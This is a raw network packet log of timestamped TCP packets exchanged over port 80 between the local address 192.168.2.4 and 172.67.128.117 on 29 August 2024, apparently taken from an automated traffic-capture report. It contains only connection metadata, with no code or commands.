                                  Aug 29, 2024 23:42:08.906733036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906745911 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906749010 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906760931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906769991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906774044 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906784058 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906800985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906801939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906816006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.906824112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906843901 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.906863928 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907016993 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907027960 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907037973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907063007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907083035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907087088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907095909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907124043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907135963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907155037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907166004 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907195091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907207012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907274961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907286882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907296896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907309055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907315969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907320976 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907331944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907339096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907366037 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907392979 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907404900 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907414913 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907427073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907433033 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907458067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907479048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907500029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907510996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907516956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907522917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907546043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907557011 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907649040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907660007 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907670021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907682896 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907686949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907696009 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907716036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907731056 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907744884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907757998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907784939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907809019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907824039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907869101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907879114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.907921076 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.907962084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908001900 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908015013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908026934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908036947 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908055067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908066988 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908099890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908111095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908140898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908159018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908214092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908225060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908233881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908246040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908253908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908257961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908267021 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908271074 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908293962 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908313036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908313990 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908353090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908819914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908864975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908895016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908910036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.908940077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.908951998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909038067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909049034 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909060001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909071922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909075975 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909084082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909095049 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909096956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909105062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909106970 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909125090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909135103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909135103 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909140110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909152985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909166098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909168959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909183979 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909198046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909212112 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909579992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909609079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909621000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909625053 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909651041 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909661055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909720898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909732103 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909742117 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909754038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909765005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909775972 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909795046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.909960985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909972906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909984112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.909993887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.910007954 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.910038948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.910181999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.910193920 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.910204887 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.910212994 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.910227060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.910252094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993037939 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993074894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993083954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993120909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993129015 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993132114 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993145943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993149042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993182898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993196964 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993215084 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993226051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993261099 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993740082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993773937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993782997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993794918 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993824959 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993830919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993843079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993854046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993869066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993874073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993900061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993920088 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.993926048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.993958950 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994206905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994219065 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994230032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994260073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994275093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994282961 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994292974 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994302988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994328976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994345903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994349003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994359016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.994395971 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.994405985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995084047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995096922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995105982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995136976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995161057 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995213985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995224953 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995234013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995245934 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995286942 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995349884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995418072 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995452881 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995464087 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995474100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995485067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995495081 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995496988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995510101 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995522976 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995541096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995562077 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995703936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995716095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995727062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995752096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995764017 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995780945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995806932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995806932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995820045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.995846987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.995858908 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996011972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996021986 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996032000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996046066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996062040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996062040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996067047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996078968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996088982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996088982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996103048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996104002 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996114016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996121883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996125937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996138096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996140003 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996151924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996162891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996166945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996175051 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996184111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996190071 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996206045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996210098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996227980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996227980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996242046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996252060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996253014 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996265888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996274948 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996277094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996289015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996296883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996299982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996313095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996320963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996324062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996335983 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996340036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996346951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996397018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996416092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996428013 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996438980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996450901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996462107 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996462107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996483088 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996504068 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996548891 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996560097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996592045 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996597052 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996608973 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996614933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996637106 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996648073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996665001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996676922 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996686935 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996696949 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996710062 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996733904 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996817112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996830940 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996843100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996854067 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996860027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996866941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996877909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996886969 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996890068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.996912956 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.996925116 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997486115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997535944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997536898 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997546911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997575998 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997579098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997589111 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997591019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997613907 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997634888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997670889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997685909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997695923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997705936 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997710943 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997718096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997730017 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997745991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997755051 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997860909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997873068 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997903109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997921944 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.997962952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997975111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.997983932 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998007059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998024940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998186111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998230934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998325109 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998336077 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998344898 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998362064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998373032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998383045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998384953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998400927 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998411894 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998414040 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998423100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998433113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998433113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998446941 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998455048 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998457909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998471022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.998481989 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998500109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.998521090 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:08.999495029 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:08.999551058 CEST4973080192.168.2.4172.67.128.117
